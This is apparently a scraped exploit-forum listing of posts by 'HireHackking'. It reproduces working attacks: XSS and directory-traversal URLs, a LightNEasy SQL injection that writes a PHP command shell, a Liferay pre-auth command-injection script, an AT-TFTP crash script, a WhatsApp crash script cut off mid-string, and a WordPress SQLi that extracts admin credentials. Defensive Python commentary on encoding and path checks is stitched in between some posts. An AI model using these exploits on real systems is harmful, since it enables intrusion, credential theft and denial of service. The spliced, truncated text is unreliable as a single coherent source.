HireHackking

Everything posted by HireHackking

  1. # Mirror: http://pastebin.com/raw.php?i=CZChGAnG
# Video: https://www.youtube.com/watch?v=V7bnLOohqqI

#!/usr/bin/python
#-*- coding: utf-8 -*
# Title: WhatsApp Remote Reboot/Crash App Android
# Product: WhatsApp
# Vendor Homepage: http://www.whatsapp.com
# Vulnerable Version(s): 2.11.476
# Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4
# Date: 26/12/2014
#
#RemoteExecution - www.remoteexecution.net
#
# Author Exploit:
# Daniel Godoy @0xhielasangre <danielgodoy@gobiernofederal.com>
# Credits:
# Gonza Cabrera
#
# Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
#
# Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even
# engaging in an interactive conversation over WhatsApp protocol
#

import argparse, sys, os, csv
from Yowsup.Common.utilities import Utilities
from Yowsup.Common.debugger import Debugger
from Yowsup.Common.constants import Constants
from Examples.CmdClient import WhatsappCmdClient
from Examples.EchoClient import WhatsappEchoClient
from Examples.ListenerClient import WhatsappListenerClient
from Yowsup.Registration.v1.coderequest import WACodeRequest
from Yowsup.Registration.v1.regrequest import WARegRequest
from Yowsup.Registration.v1.existsrequest import WAExistsRequest
from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2
from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2
from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2
from Yowsup.Contacts.contacts import WAContactsSyncRequest
import threading,time, base64

DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
COUNTRIES_CSV = "countries.csv"

######## Yowsup Configuration file #####################
# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:
# phone: Your full phone number including country code, without '+' or '00'
# id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup
#     on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions
#     of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on
#     a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials
#     or want to register, you can leave this field blank or set it to some random text.
# password: Password to use for login. You obtain this password when you register using Yowsup.
######################################################

MINE_CONFIG ="config"

def getCredentials(config = DEFAULT_CONFIG):
    if os.path.isfile(config):
        f = open(config)
        phone = ""
        idx = ""
        pw = ""
        cc = ""
        try:
            for l in f:
                line = l.strip()
                if len(line) and line[0] not in ('#',';'):
                    prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1)
                    varname = prep[0].strip()
                    val = prep[1].strip()
                    if varname == "phone":
                        phone = val
                    elif varname == "id":
                        idx = val
                    elif varname =="password":
                        pw =val
                    elif varname == "cc":
                        cc = val
            return (cc, phone, idx, pw)
        except:
            pass
    return 0

def main(phone):
    credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG )
    if credentials:
        countryCode, login, identity, password = credentials
        identity = Utilities.processIdentity(identity)
        password = base64.b64decode(password)
        # Custom message that will crash WhatsApp
        message = message = "#RemoteExecution
  2. source: https://www.securityfocus.com/bid/47479/info

Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

This vulnerability affects the following supported versions: 8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3

http://XXX.XXX.XXX.XXX/jde/E1Menu_Menu.mafService
Parameter: e1.namespace
* The POST request has been set to: %2Balert%2835890%29%2B

/jde/E1Menu_Menu.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu&e1.service=E1Menu_Menu&e1.namespace=%2Balert%2835890%29%2B HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000b7KChC3OjQct7TOz9U6NMhK:14p7umbnp; e1MenuState=100003759|
Content-Length: 12
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX
Content-Type: application/x-www-form-urlencoded
Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED

nodeId=&a=lc
  3. source: https://www.securityfocus.com/bid/47479/info

Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

This vulnerability affects the following supported versions: 8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3

http://XXX.XXX.XXX.XXX/jde/E1Menu_OCL.mafService
Parameter: e1.namespace
* The GET request has been set to: %2Balert%2848981%29%2B

/jde/E1Menu_OCL.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu&e1.service=E1Menu_OCL&e1.namespace=%2Balert%2848981%29%2B&timestamp=1290796450377 HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000xXDQLJurffGMVi6Du_UnL0Z:14p7umbnp; e1MenuState=100003759|
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX
Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED
  4. source: https://www.securityfocus.com/bid/47479/info

Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

This vulnerability affects the following supported versions: 8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3

http://XXX.XXX.XXX.XXX/jde/MafletClose.mafService
Parameter: RENDER_MAFLET
* The GET request has been set to: E1Menu"%2Balert%2844218%29%2B"

/jde/MafletClose.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu"%2Balert%2844218%29%2B"&e1.service=MafletClose&e1.namespace= HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000FGUGWkc2Y9q-dO3GqshuPVQ:14p7umbnp; e1MenuState=100003759|
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX
Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED
  5. source: https://www.securityfocus.com/bid/47500/info

webSPELL is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

webSPELL 4.2.2a is affected; other versions may also be vulnerable.

http://www.example.com/index.php?site=newsletter&pass=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
http://www.example.com/index.php?site=messenger&action=touser&touser=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
http://www.example.com/admin/admincenter.php?site=users&action=addtoclan&id=1&page=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
http://www.example.com/admin/admincenter.php?site=squads&action=edit&squadID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
http://www.example.com/admin/admincenter.php?site=contact&action=edit&contactID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
  6. source: https://www.securityfocus.com/bid/47479/info

Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

This vulnerability affects the following supported versions: 8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3

* http://XXX.XXX.XXX.XXX/jde/JASMafletMafBrowserClose.mafService
Parameter: jdemafjasLinkTarget
* The GET request has been set to: E1MENUMAIN_3860308878877903872"%2Balert%28222735%29%2B"

/jde/JASMafletMafBrowserClose.mafService?jdemafjasFrom=BrowserClose&e1.mode=view&jdeLoginAction=LOGOUT&e1.state=maximized&jdemafjasLinkTarget=E1MENUMAIN_3860308878877903872"%2Balert%28222735%29%2B"&RENDER_MAFLET=E1Menu&jdemafjasLauncher=PSFT_TE_V3_SW&e1.service=JASMafletMafBrowserClose&e1.namespace= HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=00003wyVho0_-Ma0fQp67cuqdCs:14p7ulc8o; e1MenuState=100003759|
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX
Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED
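The JD Edwards requests above use payloads of the form E1Menu"+alert(44218)+", which only fire when the parameter is concatenated into a JavaScript string literal, while the webSPELL URLs in post 5 use 1"><img src=1.png onerror=...>, which closes an HTML attribute. The two contexts need different output encoding, and the following is an added example (not code from either advisory or vendor) that renders both payloads through a vulnerable concatenation and through the correct encoder, with a parser-based check of whether the markup structure survived. The rendering functions, variable name maflet and the hidden input are assumptions made for illustration.

```python
import html
import json
import re
from html.parser import HTMLParser

# Constructed payloads, copied from the requests quoted in posts 4 and 5 above
JS_PAYLOAD = 'E1Menu"+alert(44218)+"'                                  # RENDER_MAFLET value, JavaScript string context
ATTR_PAYLOAD = '1"><img src=1.png onerror=alert(document.cookie)>'     # webSPELL pass= value, HTML attribute context


def render_js_unsafe(maflet):
    """Vulnerable pattern: request parameter concatenated into a <script> string literal."""
    return '<script>var maflet = "' + maflet + '";</script>'


def render_js_safe(maflet):
    """Emit the value as a JSON string literal. json.dumps escapes quotes and backslashes;
    '<' is escaped as well so the literal can never contain '</script>'."""
    return '<script>var maflet = ' + json.dumps(maflet).replace('<', '\\u003c') + ';</script>'


def render_attr_unsafe(value):
    """Vulnerable pattern: request parameter concatenated into a quoted attribute."""
    return '<input type="hidden" name="pass" value="' + value + '">'


def render_attr_safe(value):
    """html.escape(quote=True) converts both quote characters to entities, so the
    attribute cannot be closed early and no new tag can start inside it."""
    return '<input type="hidden" name="pass" value="' + html.escape(value, quote=True) + '">'


def js_literal_roundtrips(markup, expected):
    """True only if the expression assigned to maflet is one string literal whose decoded
    value equals the original parameter, i.e. nothing escaped into executable code."""
    m = re.search(r'var maflet = (.*);</script>', markup)
    if not m:
        return False
    try:
        return json.loads(m.group(1)) == expected
    except ValueError:          # "Extra data" etc.: the literal was broken out of
        return False


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(markup):
    """Start tags a browser-like parser sees; an injected <img> shows up here."""
    p = _TagCollector()
    p.feed(markup)
    return p.tags


if __name__ == '__main__':
    for fn in (render_js_unsafe, render_js_safe):
        print(fn(JS_PAYLOAD), js_literal_roundtrips(fn(JS_PAYLOAD), JS_PAYLOAD))
    for fn in (render_attr_unsafe, render_attr_safe):
        print(fn(ATTR_PAYLOAD), start_tags(fn(ATTR_PAYLOAD)))
```

The point of the two checks is that encoding is context-specific: the JSON encoder alone does not help inside an attribute, and html.escape alone does not help inside a script block.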
  7. source: https://www.securityfocus.com/bid/47509/info

Viola DVR is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.

Viola DVR VIO-4/1000 is vulnerable; other products may also be affected.

http://www.example.com/cgi-bin/wappwd?FILEFAIL=../../../etc/passwd
http://www.example.com/cgi-bin/wapopen?FILECAMERA=../../../etc/passwd
  8. source: https://www.securityfocus.com/bid/47526/info

SyCtel Design is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

http://www.example.com/index.php?menu=../../../proc/self/environ
http://www.example.com/index1.php?menu=../../../etc/passwd
  9. source: https://www.securityfocus.com/bid/47519/info

Automagick Tube Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Automagick Tube Script 1.4.4 is vulnerable; other versions may also be affected.

http://www.example.com/index.php?module=<script>alert(8888)</script>
  10. source: https://www.securityfocus.com/bid/47528/info

Zenphoto is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Zenphoto 1.4.0.3 is vulnerable; other versions may also be affected.

http://www.example.com/themes/zenpage/slideshow.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
http://www.example.com/themes/stopdesign/comment_form.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
  11. source: https://www.securityfocus.com/bid/47540/info

todoyu is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

todoyu 2.0.8 is vulnerable; other versions may also be affected.

http://www.example.com/todoyu/lib/js/jscalendar/php/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E
  12. source: https://www.securityfocus.com/bid/47541/info

LightNEasy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

LightNEasy 3.2.3 is vulnerable; other versions may also be affected.

# ------------------------------------------------------------------------
# Software................LightNEasy 3.2.3
# Vulnerability...........SQL Injection
# Threat Level............Critical (4/5)
# Download................http://www.lightneasy.org/
# Discovery Date..........4/21/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A SQL injection vulnerability in LightNEasy 3.2.3 can be exploited to
# extract arbitrary data. In some environments it may be possible to
# create a PHP shell.
#
#
# --PoC--

import socket

host = 'localhost'
path = '/lne323'
shell_path = '/shell.php'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)
    s.send('POST ' + path + '/index.php?do=&page= HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 73\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Cookie: userhandle=%22UNION/**/SELECT/**/CONCAT(char(60),char(63),char(112),char(104),char(112),char(32),char(115),char(121),char(115),char(116),char(101),char(109),char(40),char(36),char(95),char(71),char(69),char(84),char(91),char(39),char(67),char(77),char(68),char(39),char(93),char(41),char(59),char(32),char(63),char(62)),%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22/**/FROM/**/dual/**/INTO/**/OUTFILE%22../../htdocs/shell.php%22%23\r\n'
           'Accept: text/html\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="submit"\r\n'
           '\r\n'
           '\r\n'
           '------x--\r\n'
           '\r\n')
    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else:
        print 'shell uploaded'

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)
    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192)[:len(http_ok)]:
        print 'shell not found'
    else:
        print 'shell located at http://' + host + shell_path

upload_shell()
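The interesting part of the LightNEasy PoC is the userhandle cookie: the injection rides in a cookie rather than a form field, uses /**/ instead of spaces, spells the PHP shell as a CONCAT(char(...)) sequence, and finishes with INTO OUTFILE to write it under the web root. As an added example (not part of the AutoSec Tools PoC), the block below parses that Cookie header as the server would see it, decodes the char() sequence to show what would be written, and scores the value on the same traits a WAF or log review would key on. The sample header is copied from the PoC above; the function names and the finding labels are my own.

```python
import re
from urllib.parse import unquote

# Cookie header copied from the PoC request above (constructed sample, no live target)
RAW_COOKIE = ('userhandle=%22UNION/**/SELECT/**/CONCAT(char(60),char(63),char(112),char(104),char(112),char(32),'
              'char(115),char(121),char(115),char(116),char(101),char(109),char(40),char(36),char(95),char(71),'
              'char(69),char(84),char(91),char(39),char(67),char(77),char(68),char(39),char(93),char(41),char(59),'
              'char(32),char(63),char(62)),%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22'
              '/**/FROM/**/dual/**/INTO/**/OUTFILE%22../../htdocs/shell.php%22%23')

CHAR_CALL = re.compile(r'char\((\d+)\)', re.IGNORECASE)
INLINE_COMMENT = re.compile(r'/\*.*?\*/')


def parse_cookies(header):
    """Split a Cookie header into {name: url-decoded value}, as PHP's $_COOKIE would."""
    cookies = {}
    for part in header.split(';'):
        if '=' not in part:
            continue
        name, value = part.split('=', 1)
        cookies[name.strip()] = unquote(value.strip())
    return cookies


def decode_char_concat(sql):
    """Reassemble the text hidden in a CONCAT(char(n),char(n),...) sequence."""
    return ''.join(chr(int(n)) for n in CHAR_CALL.findall(sql))


def normalize(value):
    """Replace inline comments with a space so /**/-separated keywords match normally."""
    return INLINE_COMMENT.sub(' ', value)


def audit_value(value):
    """Return the list of injection traits found in one parameter or cookie value."""
    findings = []
    flat = normalize(value)
    if flat != value:
        findings.append('inline_comment_whitespace')   # /**/ used to dodge space filtering
    if re.search(r'\bUNION\s+SELECT\b', flat, re.IGNORECASE):
        findings.append('union_select')
    if re.search(r'\bINTO\s+(OUTFILE|DUMPFILE)\b', flat, re.IGNORECASE):
        findings.append('file_write')                  # MySQL FILE privilege abuse
    if CHAR_CALL.search(value):
        findings.append('char_encoding')               # quotes avoided via char()
    return findings


def outfile_target(value):
    """Path the statement would write to, if it contains INTO OUTFILE/DUMPFILE "path"."""
    m = re.search(r'\bINTO\s+(?:OUTFILE|DUMPFILE)\s*"([^"]*)"', normalize(value), re.IGNORECASE)
    return m.group(1) if m else None


if __name__ == '__main__':
    handle = parse_cookies(RAW_COOKIE)['userhandle']
    print(audit_value(handle))
    print(outfile_target(handle))
    print(decode_char_concat(handle))
```

Because the value is delivered in a cookie, it never appears in the URL or the form body; a detection rule that only inspects query strings and POST parameters misses it, which is why the audit runs over every cookie value.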
  13. #!/bin/sh
# Exploit title: Liferay Portal 7.0.0 M1, 7.0.0 M2, 7.0.0 M3 RCE
# Date: 11/16/2014
# Exploit author: drone (@dronesec)
# Vendor homepage: http://www.liferay.com/
# Software link: http://downloads.sourceforge.net/project/lportal/Liferay%20Portal/7.0.0%20M2/liferay-portal-tomcat-7.0-ce-m2-20141017162509960.zip
# Version: 7.0.0 M1, 7.0.0 M2, 7.0.0 M3
# Fixed in: 7.0.3
# Tested on: Windows 7
# Pre-auth command injection using an exposed Apache Felix,
# exposed by default on all Liferay Portal 7.0 installs.
#
# ./liferay_portal7.sh 192.168.1.1 "cmd.exe /C calc.exe"
#

(
echo open $1 11311
sleep 1
echo system:getproperties
sleep 1
echo exec \"$2\"
sleep 1
) | telnet
  14. source: https://www.securityfocus.com/bid/47542/info

Dolibarr is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the affected application. Information harvested may aid in further attacks.

The attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Dolibarr 3.0.0 is vulnerable; other versions may also be affected.

http://www.example.com/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
http://www.example.com/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
  15. source: https://www.securityfocus.com/bid/47552/info

Nuke Evolution Xtreme is prone to a local file-include vulnerability and an SQL-injection vulnerability.

An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process.

The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Nuke Evolution Xtreme 2.0 is vulnerable; other versions may also be affected.

http://www.example.com/[path]/modules.php?name=Surveys&op=results&pollID=3+and+1=2+union+select+1,version(),3,4,5--
http://www.example.com/[path]/modules.php?name=News&file=../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/modules.php?name=Private_Messages&file=../../../../../../../../../../etc/passwd%00
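Posts 7, 8, 14 and 15 are the same bug class: a request parameter is joined onto a base directory and opened, so ../ sequences walk out of it, and the trailing %00 in the Dolibarr and Nuke Evolution URLs truncates whatever suffix the application appends (a .php or theme extension) at the NUL byte. The following added example (not code from any of those projects) shows the naive join beside a resolver that decodes once, rejects NUL and absolute paths, normalizes, and requires the result to stay under the base. The base directory, the sample parameter values and the function names are assumptions for illustration.

```python
import posixpath
from urllib.parse import unquote

# Constructed parameter values modelled on the URLs in posts 7, 8, 14 and 15, mapped to
# whether a correct resolver should accept them.
SAMPLES = {
    '../../../etc/passwd': False,                                            # Viola DVR / SyCtel
    '../../../proc/self/environ': False,                                     # SyCtel (log poisoning target)
    '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00': False,   # Dolibarr, URL-encoded + NUL
    '../../../../../../../../../../etc/passwd%00': False,                    # Nuke Evolution, NUL truncation
    'pictures/cam1.jpg': True,
    'news.php': True,
}

BASE = '/var/www/app/files'   # assumed document/data directory


class UnsafePath(ValueError):
    pass


def naive_resolve(base, user_path):
    """The vulnerable pattern: decode and concatenate, then open whatever results."""
    return posixpath.normpath(base + '/' + unquote(user_path))


def resolve_under(base, user_path):
    """Return the absolute path for user_path under base, or raise UnsafePath."""
    decoded = unquote(user_path)          # decode exactly once; a second decode reopens %252e tricks
    if '\x00' in decoded:
        raise UnsafePath('NUL byte in path')
    if decoded.startswith(('/', '\\')):
        raise UnsafePath('absolute path')
    decoded = decoded.replace('\\', '/')  # treat backslash as a separator, as Windows PHP would
    candidate = posixpath.normpath(posixpath.join(base, decoded))
    if candidate != base and not candidate.startswith(base + '/'):
        raise UnsafePath('path escapes base directory')
    return candidate


def is_allowed(user_path, base=BASE):
    try:
        resolve_under(base, user_path)
        return True
    except UnsafePath:
        return False


if __name__ == '__main__':
    for sample in SAMPLES:
        print(repr(sample), '->', naive_resolve(BASE, sample).replace('\x00', '<NUL>'), '| allowed:', is_allowed(sample))
```

On a real deployment the check belongs after os.path.realpath on the joined result as well, so that a symlink inside the base cannot point back out; the prefix check above is the string-level half of that rule.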
  16. source: https://www.securityfocus.com/bid/47561/info

AT-TFTP is prone to a remote denial-of-service vulnerability. Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.

AT-TFTP 1.8 is affected; other versions may also be vulnerable.

#!/usr/bin/python
##############################################################################
# Exploit : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX
# http://secpod.org/wintftp_dos_poc.py
# Reference :
# Author : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################

import socket
import sys

host = '127.0.0.1'
port = 69

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

addr = (host,port)
# TFTP read request (opcode 1) for "../../../boot.ini" in netascii mode
data = '\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\
       '\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
s.sendto(data, (host, port))
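The PoC's byte string is a plain RFC 1350 read request: a two-byte opcode (1 = RRQ), the NUL-terminated filename ../../../boot.ini and the NUL-terminated mode netascii. The following added example (not part of the SecPod PoC) builds and parses that packet so the structure is visible, and shows the filename check a TFTP server has to apply before touching the filesystem; the function names are my own and the only sample input is the PoC's packet, reassembled from its two string literals.

```python
import struct

OPCODES = {1: 'RRQ', 2: 'WRQ', 3: 'DATA', 4: 'ACK', 5: 'ERROR'}
MODES = ('netascii', 'octet', 'mail')

# Packet sent by the PoC above (constructed from its two string literals)
POC_PACKET = (b'\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f'
              b'\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00')


def build_request(opcode, filename, mode='octet'):
    """RFC 1350 RRQ/WRQ: 2-byte big-endian opcode, NUL-terminated filename, NUL-terminated mode."""
    if opcode not in (1, 2):
        raise ValueError('opcode must be 1 (RRQ) or 2 (WRQ)')
    return struct.pack('!H', opcode) + filename.encode('ascii') + b'\x00' + mode.encode('ascii') + b'\x00'


def parse_request(packet):
    """Return (opcode name, filename, mode) for a RRQ/WRQ; raise ValueError on malformed input."""
    if len(packet) < 4:
        raise ValueError('packet too short')
    (opcode,) = struct.unpack('!H', packet[:2])
    if opcode not in (1, 2):
        raise ValueError('not a RRQ/WRQ: opcode %d' % opcode)
    fields = packet[2:].split(b'\x00')
    # a well-formed request ends with the mode's NUL, so the last split element is empty
    if len(fields) < 3 or fields[-1] != b'':
        raise ValueError('filename/mode not NUL-terminated')
    filename = fields[0].decode('ascii', errors='replace')
    mode = fields[1].decode('ascii', errors='replace').lower()
    if mode not in MODES:
        raise ValueError('unknown transfer mode %r' % mode)
    return OPCODES[opcode], filename, mode


def is_traversal(filename):
    """Names a TFTP server must refuse: parent references, absolute paths, drive letters."""
    normalized = filename.replace('\\', '/')
    parts = normalized.split('/')
    return ('..' in parts
            or normalized.startswith('/')
            or (len(normalized) > 1 and normalized[1] == ':'))


def serve_request(packet):
    """What a hardened server does with the PoC packet: parse, then refuse before any file I/O."""
    op, name, mode = parse_request(packet)
    if is_traversal(name):
        return ('ERROR', 2, 'Access violation')     # TFTP error code 2 per RFC 1350
    return (op, name, mode)


if __name__ == '__main__':
    print(parse_request(POC_PACKET))
    print(serve_request(POC_PACKET))
```

The post says the request crashes AT-TFTP 1.8; it does not say why, so the example makes no claim about the server's internals beyond the fact that the filename it receives is a traversal string that should never reach open().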
  17. source: https://www.securityfocus.com/bid/47569/info

TemaTres is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

TemaTres 1.3 is vulnerable; prior versions may also be affected.

http://www.example.com/tematres1.3/vocab/index.php?_search_expresions=[xss]
  18. source: https://www.securityfocus.com/bid/47574/info

The Sermon Browser plugin for WordPress is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Sermon Browser 0.43 is vulnerable; other versions may also be affected.

<?php
if(!$argv[1]) die("
Usage : php exploit.php [site]
Example : php exploit.php http://site.com/wp/
");

print_r("
# Title......: [ WordPress SermonBrowser Plugin 0.43 SQL Injection ]
# Author.....: [ Ma3sTr0-Dz ]
# Date.......: [ 25-o4-2o11 ]
# Location ..: [ ALGERIA ]
# HoMe ......: [ wWw.sEc4EvEr.CoM ]
# Download ..: [ http://www.4-14.org.uk/wordpress-plugins/sermon-browser ]
# Gr33tz ....: [ All Sec4ever Member'z ]
# Real Bug Founder : Lagripe-Dz

-==[ ExPloiT ]==-

# SQL Inj : http://site/wp/?sermon_id=-1+union+select+version(),2--
# XSS     : http://site/wp/?download&file_name=<script>alert(0)</script>
# FPD     : http://site/wp/wp-content/plugins/sermon-browser/sermon.php

-==[ Start ]==-
");

$t=array("db_usr"=>"user()","db_ver"=>"version()","db_nam"=>"database()","usr_nm"=>"user_login","passwd"=>"user_pass");

// hex-encode the <tag> markers so they survive the query without quotes
function text2hex($string) {
    $hex = '';
    $len = strlen($string) ;
    for ($i = 0; $i < $len; $i++) {
        $hex .= str_pad(dechex(ord($string[$i])), 2, 0, STR_PAD_LEFT);
    }
    return $hex;
}

foreach($t as $r=>$y){
    $x=@file_get_contents($argv[1]."?sermon_id=-1/**/UnIoN/**/SeLeCt/**/group_concat(0x".text2hex("<$r>").",$y,0x".text2hex("<$r>")."),2+from+wp_users+where+ID=1--");
    preg_match_all("{<$r>(.*?)<$r>}i",$x, $dz);
